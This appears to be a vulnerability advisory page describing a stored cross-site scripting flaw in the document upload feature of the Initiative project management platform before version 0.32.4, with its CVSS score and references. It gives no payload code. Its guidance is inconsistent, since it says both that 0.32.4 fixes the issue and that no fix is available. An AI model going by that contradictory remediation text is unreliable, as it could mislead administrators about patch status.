Initiative Project Management Platform: Malicious File Uploads

Summary

If you're using an older version of Initiative, an attacker could steal sensitive information by uploading a malicious file. This can happen if you allow users to upload files in the project management section. Update to the latest version, 0.32.4, to fix this issue and protect your data.

What to do

No fix is available yet. Check with your software vendor for updates.

Affected software

Vendor	Product	Affected versions	Fix available
morelitea	initiative	<= 0.32.2	–

Original title

Initiative is a self-hosted project management platform. Versions of the application prior to 0.32.4 are vulnerable to Stored Cross-Site Scripting (XSS) in the document upload functionality. Any us...

Original description

Initiative is a self-hosted project management platform. Versions of the application prior to 0.32.4 are vulnerable to Stored Cross-Site Scripting (XSS) in the document upload functionality. Any user with upload permissions within the "Initiatives" section can upload a malicious `.html` or `.htm` file as a document. Because the uploaded HTML file is served under the application's origin without proper sandboxing, the embedded JavaScript executes in the context of the application. As a result, authentication tokens, session cookies, or other sensitive data can be exfiltrated to an attacker-controlled server. Additionally, since the uploaded file is hosted under the application's domain, simply sharing the direct file link may result in execution of the malicious script when accessed. Version 0.32.4 fixes the issue.

nvd CVSS3.1 8.7

Vulnerability type

CWE-79 Cross-site Scripting (XSS)

CWE-434 Unrestricted File Upload

https://github.com/Morelitea/initiative/releases/tag/v0.32.4 Product Release Notes
https://github.com/Morelitea/initiative/security/advisories/GHSA-v38c-x27x-p584 Exploit Vendor Advisory